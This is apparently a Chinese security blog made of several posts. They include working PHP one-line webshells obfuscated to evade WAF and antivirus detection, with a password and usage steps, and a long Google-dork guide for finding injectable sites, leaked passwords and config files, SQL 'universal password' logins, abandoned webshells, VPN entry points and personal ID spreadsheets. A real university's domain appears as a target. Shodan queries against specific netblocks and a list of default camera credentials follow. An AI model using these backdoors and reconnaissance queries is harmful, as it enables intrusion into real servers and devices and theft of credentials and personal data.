1.利用md5绕过waf的一句话

本体：

<?php
        $str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
        $str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
        $str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
        if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
                $str4 = strrev($_POST['a']);
                $str5 = strrev($str4);
                $str3($str5);
    }
?>

本质

<?php
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
    assert($_POST['a']);
}
?>

利用方式

MD5("3fion0hj5965698jhh") == "2858b958f59138771eae3b0c2ceda426"
http://x.x.x.x/x.php?a=3fion0hj5965698jhh 菜刀密码a可以连上。

但是执行php代码需要反转：
比如正常a=phpinfo(); 这个需要a=;)(ofniphp才能正确执行。绕waf

2.get_defined_vars函数马

<?php 
eval(get_defined_vars()['_POST'][true]);
?>

3.array_push函数马

$arr = array('0','1',array('0',$_GET['1']));
array_push($arr,'3',array('0','1',array('0')));
define('G',$arr1[2][1]);
eval(G);

define('G',$_GET[1]);
eval('1;'.G);

4.待更....

Webshell防杀学习

把用纯php代码实现的Webshell后门(以下统称为"木马")，主要分为以下几类：

单/少功能木马
能完成写入文件、列目录、查看文件、执行一些系统命令等少量功能的Webshell。
逻辑木马
利用系统逻辑漏洞或构造特殊触发条件，绕过访问控制或执行特殊功能的Webshell。
一句话木马
可以在目标服务器上执行php代码，并和一些客户端(如菜刀、Cknife)进行交互的Webshell。
多功能木马
根据PHP语法，编写较多代码，并在服务器上执行，完成大量间谍功能的Webshell(大马)。

一句话原理

客户端将PHP代码使用特殊参数名(密码)，发送给放置在服务端上的一句话木马文件；
一句话木马脚本在服务器上执行发来的PHP代码，然后将执行结果回传给客户端，客户端将结果解析并展示给操作者。

查杀现状

根据一句话木马原理，我们知道必须要在服务器上执行客户端发来的字符串形式的PHP代码。

脚本要将字符串(或文件流)当作PHP代码执行，目前主要会使用以下函数：

函数	说明
eval	PHP 4, PHP 5, PHP 7+ 均可用，接受一个参数，将字符串作为PHP代码执行
assert	PHP 4, PHP 5, PHP 7.2 以下均可用，一般接受一个参数，php 5.4.8版本后可以接受两个参数
正则匹配类	preg_replace/ mb_ereg_replace/preg_filter等
文件包含类	include/include_once/require/require_once/file_get_contents等

文章参考

LandGrey php一句话木马绕过研究
https://www.t00ls.net/viewthread.php?tid=45816&highlight=%E4%B8%80%E5%8F%A5%E8%AF%9D

阿乾 18.5.11分享个过D盾某狗的一句话小马
https://www.t00ls.net/viewthread.php?tid=45815&highlight=%E4%B8%80%E5%8F%A5%E8%AF%9D

love71 简短的免杀一句话
https://www.t00ls.net/viewthread.php?tid=45404&highlight=%E4%B8%80%E5%8F%A5%E8%AF%9D

千剑

Google Hacking

intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle

inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl

intext: 从网页中搜索指定的关键字,可专门用它来穿透到漏洞页面等……也可用allintext

filetype: 搜索指定的文件后缀,例如:sql mdb txt bak backup ini zip rar doc xls……

site: 在某个特定的网站内中搜索指定的内容

link: 搜索和该链接有关联连接,比如:友情链接

index of: 找目录遍历会用到

google所支持的一些通配符(建议选择性的用,越精确,就意味着结果越少,这样我们容易漏掉一些目标,毕竟不是正则,我们的最终目的是找到漏洞):

    +   强制包含某个字符进行查询
    -   查询的时候忽略某个字符
    ""  查询的时候精确匹配双引号内的字符
    .   匹配某单个字符进行查询
    *   匹配任意字符进行查询
    |   或者,多个选择,只要有一个关键字匹配上即可

针对目标站点利用样例：

目录遍历漏洞  语法为: site:jiebao8.top intitle:index.of
配置文件泄露  语法为: site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
数据库文件泄露  site:jiebao8.top ext:sql | ext:dbf | ext:mdb
日志文件泄露 site:jiebao8.top ext:log
备份和历史文件 site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
SQL错误  site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()
7 公开文件信息
site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
8  phpinfo()  site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"

找到可能存在的包含和命令执行类漏洞:

    inurl:footer.inc.php?settings=
    inurl:/pb_inc/admincenter/index.php?page=
    inurl:/pnadmin/categories.inc.php?subpage=
    inurl:/index.php??view=src/sistema/vistas/
    inurl:/edit.php?em=file&filename=
    inurl:/path_to_athena/athena.php?athena_dir= 远程包含
    inurl:/path_to_qnews/q-news.php?id=  远程包含
    inurl:/inc/backend_settings.php?cmd=
    inurl:login.action strus2系列执行漏洞利用
    inurl:php?x=                    inurl:php?open=
inurl:php?visualizar=         inurl:php?pagina=
inurl:php?inc=                 inurl:php?include_file=
inurl:php?page=                inurl:php?pg=
inurl:php?show=                inurl:php?cat=
inurl:php?file=                inurl:php?path_local=
inurl:php?filnavn=            inurl:php?HCL_path=
inurl:php?doc=                 inurl:php?appdir=
inurl:php?phpbb_root_dir=    inurl:php?phpc_root_path=
inurl:php?path_pre=           inurl:php?nic=
inurl:php?sec=                 inurl:php?content=
inurl:php?link=                inurl:php?filename=
inurl:php?dir=                 inurl:php?document=
inurl:index.php?view=         inurl:*.php?locate=
inurl:*.php?place=             inurl:*.php?layout=
inurl:*.php?go=                inurl:*.php?catch=
inurl:*.php?mode=            inurl:*.php?name=
inurl:*.php?loc=             inurl:*.php?f=
inurl:*.php?inf=             inurl:*.php?pg=
inurl:*.php?load=            inurl:*.php?naam=
allinurl:php?page=           allinurl:php?file= 
inurl:php?x=                  inurl:admin.php?cal_dir=
inurl:php?include=           inurl:php?nav=
inurl:*.php?sel=             inurl:php?p=
inurl:php?conf=              inurl:php?prefix=
inurl:theme.php?THEME_DIR= 
inurl:php?lvc_include_dir=  
inurl:php?basepath=          inurl:php?pm_path=
inurl:php?user_inc=          inurl:php?cutepath=
inurl:php?fil_config=        inurl:php?libpach=
inurl:php?pivot_path=        inurl:php?rep=
inurl:php?conteudo=          inurl:php?root=
inurl:php?configFile         inurl:php?pageurl
inurl:php?inter_url          inurl:php?url=
inurl:php?cmd=                inurl:path.php?my=
inurl:php?xlink=              inurl:php?to=
inurl:file.php?disp=

找各类数据库注入:

    inurl:categorysearch.php?indus=
    intext:"樂天台東民宿網" inurl:news_board.php 
    小商城类注入:
            inurl:".php?catid=" intext:"View cart"
            inurl:".php?catid=" intext:"Buy Now"
            inurl:".php?catid=" intext:"add to cart"
            inurl:".php?catid=" intext:"shopping"
            inurl:".php?catid=" intext:"boutique"
            inurl:".php?catid=" intext:"/store/"
            inurl:".php?catid=" intext:"/shop/"
            inurl:".php?catid=" intext:"Toys"
            inurl:details.php?BookID=
            inurl:shop.php?do=part&id=

普通cms类注入:

 inurl:article.php?ID=        inurl:newsDetail.php?id=
 inurl:show.php?id=            inurl:newsone.php?id=
 inurl:news.php?id=            inurl:event.php?id=
 inurl:preview.php?id=        inurl:pages.php?id=
 inurl:main.php?id=            inurl:prod_detail.php?id=
 inurl:view.php?id=            inurl:product.php?id=
 inurl:contact.php?Id=        inurl:display_item.php?id=
 inurl:item.php?id=            inurl:view_items.php?id=
 inurl:details.asp?id=        inurl:profile.asp?id=
 inurl:content.asp?id=        inurl:display_item.asp?id=
 inurl:view_detail.asp?ID=    inurl:section.php?id=
 inurl:theme.php?id=          inurl:produit.php?id=
 inurl:chappies.php?id=       inurl:readnews.php?id=
 inurl:rub.php?idr=           inurl:pop.php?id=
 inurl:person.php?id=         inurl:read.php?id=
 inurl:reagir.php?num=        inurl:staff_id=
 inurl:gallery.php?id=        inurl:humor.php?id=
 inurl:spr.php?id=            inurl:gery.php?id=
 inurl:profile_view.php?id=
 inurl:fellows.php?id=        inurl:ray.php?id=
 inurl:productinfo.php?id=
 inurl:file.php?cont=         inurl:include.php?chapter=
 inurl:principal.php?param=
 inurl:general.php?menue=     inurl:php?pref=
 inurl:nota.php?chapter=      inurl:php?str=
 inurl:php?corpo=               inurl:press.php?*

除了上面这些常规找注入的方式,不妨直接在网页标题或者url中搜sql语句,说不定也会有收获:

intitle:注入常用的一些sql语句,比如:常用的union,substr(),select等等……

批量搜集万能密码(属于注入的一种):

    inurl:"wladmin/login.asp"  
    Username : '=' 'or'
    Password : '=' 'or'

    intext:POWERED BY Versatile Software Services       默认后台/alogin.aspx
    User ==> 'or''='
    Pass ==> 'or''='

    inurl:/media.php?hal=login
    Email: '=''or'@gmail.com
    Pass: '=''or'

    intext:"Powered by : Best Webmasterz." 默认后台/admin
    User : '=' 'OR'
    Pass : '=' 'OR'

    intext:"Web Design and Maintenance by Cloud 5 Solutions" 默认后台/admin/login.php
    User : '=' 'OR'
    Pass : '=' 'OR'

    intext:"网站设计：火龙科技" 默认后台/maintain/login.php
    Username : '=' 'or'
    Password : '=' 'or'

    intext:"Powered by Moodyworld" 默认后台/admin/
    Username : '=' 'or'
    Password : '=' 'or'

找遗留的各种数据库报错,物理路径,数据库版本,服务器探针类文件等等……:

    site:*.tw  inurl:/phpinfo.php
    filetype:log "PHP Parse error"| "PHP Warning"
    site:*.tw  "id=" & intext:"Warning: mysql_fetch_array()
    site:*.jp  "id=" & intext:"Warning: getimagesize()
    site:*.br  "id=" & intext:"Warning: array_merge()
    site:*.tw  "id=" & intext:"Warning: mysql_fetch_assoc()
    site:*.tw  "id=" & intext:"Warning: mysql_result()
    site:*.jp  "id=" & intext:"Warning: pg_exec()
    site:*.tw  "id=" & intext:"Warning: require()
    inurl:/robots.txt site:*.*

搜集各种账号密码,比如,数据库密码,ftp,vpn,htpasswd,telnet等等……:

    可能会遗留的密码文件:
            inurl:passlist.txt
            inurl:password.txt

    重要配置文件泄露:
            inurl:/application/configs/  配置文件名为/application/configs/application.ini

    htpasswd:
            htpasswd.bak filetype:htpasswd

    vpn(cisco)[为捅内网,做准备]:
            filetype:pcf  "GroupPwd"

    cisco在线密码解密网站:
            https://www.unix-ag.uni-kl.de/~massar/bin/cisco-decode



    ftp:
            "index of/" "ws_ftp.ini" "parent directory"
            "your password is" filetype:log
            filetype:ini inurl:"serv-u.ini"
            filetype:ini inurl:flashFXP.ini
            filetype:ini ServUDaemon
            filetype:ini wcx_ftp
            filetype:ini ws_ftp pwd
            ext:inc "pwd=" "UID="
            auth_user_file.txt
            例如:
                    http://www.cryptoman.com/ftp/
                    http://www.cryptoman.com/ftp/WS_FTP.ini
    其他密码:
            admin account info" filetype:log

批量找目录遍历[上传点,数据库文件下载,phpmyadmin,网站后台及网站各种备份,源代码泄露等同样也可以用这种方式慢慢找]:

    site:*.hk index of /admin
    site:*.hk index of /upfiles
    site:*.hk index of /fckeditor/editor/
    site:*.tw index of /admin/uploadfile
    site:*.tw index of /admin/file
    site:*.tw index of /system/file
    site:*.tw index of /phpmyadmin
    site:*.tw index of /web/backup/
    inurl:/phpmyadmin/index.php site:*.tw

搜同行们的各种工具脚本:

绝大部分人在用别人东西的时候,基本是很少看里面代码的[即使开源],更不要说去除特征及后门,没办法现状如此,大家都很懒,既是如此,就不免要把自己的成果也被迫的共享给别人一份,所以养成良好的读代码习惯,是有必要的。

搜同行的脱裤脚本:

    intitle:登录 - Adminer  这里只是随便举个例子,你可以自己平时多搜集一些境内外常用的脱裤脚本的标题,文件名什么的,慢慢尝试

同样,你也可以用上面这种方式来找下别人的aspx嗅探脚本,例如:

    websniff

找别人遗留的各种webshell,平时注意多搜集一些镜内外常用的大马特征,这里只是随便举几个例子,你可以随意组装自己的:

inurl:b374k.php filetype:php
inurl:c99.php
inurl:c100.php Generation time:
inurl:itsecteam_shell.php
intext:x2300 Locus7Shell v. 1.0a beta Modded by
intext:c99shell inurl:c99.php
powered by Captain Crunch Security Team
"inurl:c99.php" + "intext:safe"
intitle:r57shell
intitle:c99shell +uname
inurl:c99.php uid=0(root)
intitle:c99shell+filetype:php
intitle:ly0kha shell
inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"
"Shell" filetypehp intext:"uname -a:" "EDT 2010"
intitle:"intitle:r57shell"
inurl:"c99.php" & intext:Encoder Tools Proc. 
inurl:"c100.php" & intext:Encoder Tools Proc. 
intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc.

找到目标的owa和vpn入口[内网入口]:

 owa入口:
 inurl:/owa/auth/logon intitle:outlook
 inurl:/owa/auth/logon intext:outlook
vpn入口:
 inurl:/sslvpn site:hk

找些好下手的目标子域:

site:polyu.edu.hk inurl:asp?pid=
site:polyu.edu.hk inurl:aspx?id=
site:polyu.edu.hk inurl:php?id=
site:polyu.edu.hk inurl:jsp?id=
site:polyu.edu.hk inurl:do?id=
site:polyu.edu.hk inurl:cgi?id=

找目标的数据库备份及其他敏感文件目录：

[一般后缀都是sql,mdb,txt……],像数据库和网站备份这种东西,还是建议直接用工具跑比较好,前提字典要自己精心制作:

    filetype:sql inurl:backup inurl:wp-content
    inurl:/eWebEditor/db/ site:*.com

从目标网站上搜集目标邮箱:

    site:*.gov.tw *@gov.tw

不错的google hacking站点:

    https://cxsecurity.com/exploit/  极力推荐此站点,里面已经为我们准备好各种各样的高质量google dorks
    https://www.exploit-db.com/google-hacking-database/ 并不推荐,exp不错,但这方面比较废

其他的一些小恶作剧:

    搜集个人身份证信息
            filetype:xls 身份证 site:cn
    搜集被盗QQ号什么的
    搜集别人还在有效期的信用卡,千万不要干坏事儿,不然会被请去喝茶的……
    还有图片识别,位置识别,谷歌为我提供了很多很强大的功能,有必要的话可以去学习如何使用谷歌的这些api

关于robots.txt文件的作用:

    此文件一般位于网站根目录下,规定了搜索引擎不能爬行的一些目录,一般都是一些敏感目录,比如:后台,数据库连接配置文件,安装目录等等……
    一般我们在试了几个常用的后台目录都不行的情况,习惯性的就会直接去访问下目标的robots.txt文件,很可能这文件里面就存的有后台路径
    但,那只是有可能,不尝试,连可能都没有

shodan和zoomeye

Shodan

shodan 入门[在入侵一些网络设备的时候还是非常好用的,俗称"工控设备渗透"]:
[不像谷歌,bing那样只是单单是基于web爬行,shodan则是基于网络旗标搜索的,我们主要可以用它来碰各种网络设备的默认密码默认只能看到50个结果,可能需要付点费才能看到更多的搜索结果]

官方站点[去注册个账号,必须的]:
https://www.shodan.io/

shodan 内置的几个简单过滤器:
city: 城市,貌似只支持英文
country: 国别,比如:cn,us,jp,tw,br,ph,vn,hk
hostname: 主机名[域名如果是子域还需要在前面加个.]
net: 网络地址范围,可以是单个ip或者cidr格式
os : 操作系统 centOS,win32,red hat,suse 等等
port: 根据端口,HTTP (80),FTP (21),SSH (22),SNMP (161),SIP (5060)等等
product: 具体的产品名称

下面是一些简单的搜索实例:

搜集某个城市的特定设备标识[自己多收集一些常见的软件和设备标识]:

            Microsoft-IIS/5.0 city:"TOKYO"   可以逐个尝试写权限
            Microsoft-IIS/6.0 city:"Seoul"        
            Microsoft-IIS/7.5 city:"Hong Kong"
            apache city:"Nagoya"
            Apache/2.2.27 city:"Nagoya"
            Tomcat city:"Seoul"
            cisco city:"Osaka"
            tplink city:"nanjing"

搜索特定版本操作系统及特定端口:

            os:"linux" net:"72.34.62.0/24"
            os:"windows" net:"195.40.91.0/24"
            Apache city:"Hong Kong" port:"8080"  product:"Apache Tomcat/Coyote JSP engine"
            Apache city:"Seoul" port:"8080"
            hostname:".polyu.edu.hk" os:"windows"

搜索指定国家地域的特定类型软件(还是那句话,多搜集一些软件标识):

            product:"tomcat"  net:"158.132.18.0/24"
            product:"apache"  net:"158.132.18.0/24"
            product:"iis"     net:"158.132.18.0/24"
            port:"8080" jboss country:CN

扫描指定网段的所有数据库服务器:

            product:"Mysql"  net:"140.117.13.0/24" port:"3306"
            port:"1433" net:"78.131.197.0/24"
            port:"5432" net:"77.55.149.0/24"
            port:"1521" net:"78.143.192.0/12"
            port:"1521" city:"Osaka"

搜索远程管理终端:

            os:"windows" port:"3389" net:"107.160.1.0/24"
            os:"linux" port:"22" net:"107.160.1.0/24"
            os:"linux" port:"23" net:"107.160.1.0/24"
            os:"linux" port:"23" net:"87.124.0.0/15"

搜路由:

搜索ftp:

            port:"21" net:"107.160.1.0/24"
            port:"69" net:"218.242.16.0/24"

在某个城市中搜索指定的端口,操作系统及设备:

            city:"Hong Kong" port:"69"
            city:"Hong Kong" port:"3389"
            city:"Hong Kong" port:"22"
            city:"Hong Kong" port:"23"
            city:"Hong Kong" port:"3306"
            city:"Hong Kong" port:"110"
            city:"Hong Kong" os:"windows"
            city:"Hong Kong" product:"cisco"
            city:"Hong Kong" port:"8080"

按照国家进行搜索指定的设备,端口,服务器:

            port:"23" country:CN
            port:"1433" country:CN
            port:"3389" country:CN
            tplink country:CN
            huawei country:CN
            netcam  country:CN
            country:CN net:"115.225.113.0/24" port:"22"
            country:CN router
            admin login  country:HK
            hacked by country:HK

搜集缺省密码:

            "default password" city:"Hong Kong"
            country:CN "default password"

搜exp[其实,就是把exploit上的东西扒下来]:

            https://exploits.shodan.io/welcome

    搜索各类漏洞摄像头:
            netcam net:"187.189.82.0/24"

    批量搜集一些开源程序,尝试0day批量利用:

    下面是一些常见的默认用户名密码,可以撞撞运气:
            ACTi: admin/123456 or Admin/123456
            Axis (traditional): root/pass,
            Axis (new): requires password creation during first login
            Cisco: No default password, requires creation during first login
            Grandstream: admin/admin
            IQinVision: root/system
            Mobotix: admin/meinsm
            Panasonic: admin/12345
            Samsung Electronics: root/root or admin/4321
            Samsung Techwin (old): admin/1111111
            Samsung Techwin (new): admin/4321
            Sony: admin/admin
            TRENDnet: admin/admin
            Toshiba: root/ikwd
            Vivotek: root/<blank>
            WebcamXP: admin/ <blank>

    针对某个端口,批量搜集感染了某种数据标志的木马:

    批量搜集一些经典漏洞,比如:心脏滴血,bash远程执行,等等……:

Zoomeye

ZoomEye快捷键:

显示帮助 shift+/
隐藏该帮助 ESC 
回到首页 shift 
高级搜索 Shift +s 
聚焦搜索框 s

指定搜索的组件以及版本

app：组件名称

ver：组件版本

例如：搜索 apache组件版本2.4

app:apache ver:2.4

指定搜索的端口

port:端口号

例如：搜索开放了SSH端口的主机

port:22
一些服务器可能监听了非标准的端口。要按照更精确的协议进行检索，可以使用service进行过滤。

指定搜索的操作系统

OS:操作系统名称

例如：搜索Linux操作系统

OS：Linux

指定搜索的服务

service：服务名称

例如，搜素SSH服务

Service：SSH

指定搜索的地理位置范

country：国家名

city：城市名

例如：

country:China

city：Beijing

搜索指定的CIDR网段

CIDR:网段区域

例如：

CIDR：192.168.158.12/24

搜索指定的网站域名

Site:网站域名

例如：

site:www.baidu.com

搜索指定的主机名

Hostname:主机名

例如：

hostname:zwl.cuit.edu.cn

搜索指定的设备名

Device：设备名

例如：

device:router

搜索具有特定首页关键词的主机:

Keyword：关键词

例如：

keyword:technology

文章参考

T00ls 熟练利用google,shodan及bing hacking辅助快速渗透[主要针对大型目标]
https://www.t00ls.net/viewthread.php?tid=38850&highlight=google%2Bhack

信息收集利器：ZoomEye
http://www.freebuf.com/sectool/163782.html

千剑

Burp_Suit…

2017年12月18日2018年6月4日
by harmoc

前段时间我的burp1.7.13过期，去群里问也好，去搜索引擎找也好，去各种各样安全论坛也好，最终1.7以上的版本只有BurpUnlimited能用。
然而只要把它的文件放到我的工具包文件夹里就不能用，放在其他地方就行。
最终发现，竟然是文件路径里不能带空格。。。。java会出错。。。

To have no unexpected error, please leave all file in the folders which have not any space character (including java binary file in case not run with default java).

随手附上其Github地址：
https://github.com/mxcxvn/BurpUnlimited

标签： <span>工具收集</span>

子域名查找整理

Misc

在线搜索

在线查找

通过AS号( Autonomous System Numbers)进行查找：

证书透明度：

参考：

在T00ls的一句…

1.利用md5绕过waf的一句话

本体：

本质

利用方式

2.get_defined_vars函数马

3.array_push函数马

4.待更....

Webshell防杀学习

一句话原理

查杀现状

文章参考

Google ha…

Google Hacking

针对目标站点利用样例：

找到可能存在的包含和命令执行类漏洞:

找各类数据库注入:

普通cms类注入:

除了上面这些常规找注入的方式,不妨直接在网页标题或者url中搜sql语句,说不定也会有收获:

批量搜集万能密码(属于注入的一种):

找遗留的各种数据库报错,物理路径,数据库版本,服务器探针类文件等等……:

搜集各种账号密码,比如,数据库密码,ftp,vpn,htpasswd,telnet等等……:

批量找目录遍历[上传点,数据库文件下载,phpmyadmin,网站后台及网站各种备份,源代码泄露等同样也可以用这种方式慢慢找]:

搜同行们的各种工具脚本:

搜同行的脱裤脚本:

同样,你也可以用上面这种方式来找下别人的aspx嗅探脚本,例如:

找别人遗留的各种webshell,平时注意多搜集一些镜内外常用的大马特征,这里只是随便举几个例子,你可以随意组装自己的:

找到目标的owa和vpn入口[内网入口]:

找些好下手的目标子域:

找目标的数据库备份及其他敏感文件目录：

从目标网站上搜集目标邮箱:

不错的google hacking站点:

其他的一些小恶作剧:

关于robots.txt文件的作用:

shodan和zoomeye

Shodan

搜集某个城市的特定设备标识[自己多收集一些常见的软件和设备标识]:

搜索特定版本操作系统及特定端口:

搜索指定国家地域的特定类型软件(还是那句话,多搜集一些软件标识):

扫描指定网段的所有数据库服务器:

搜索远程管理终端:

搜路由:

搜索ftp:

在某个城市中搜索指定的端口,操作系统及设备:

按照国家进行搜索指定的设备,端口,服务器:

搜集缺省密码:

搜exp[其实,就是把exploit上的东西扒下来]:

Zoomeye

ZoomEye快捷键:

指定搜索的组件以及版本

app：组件名称

ver：组件版本

指定搜索的端口

port:端口号

指定搜索的操作系统

OS:操作系统名称

指定搜索的服务

service：服务名称

指定搜索的地理位置范

country：国家名

city：城市名

搜索指定的CIDR网段

CIDR:网段区域

搜索指定的网站域名

Site:网站域名

搜索指定的主机名

Hostname:主机名

搜索指定的设备名

Device：设备名

搜索具有特定首页关键词的主机:

Keyword：关键词

文章参考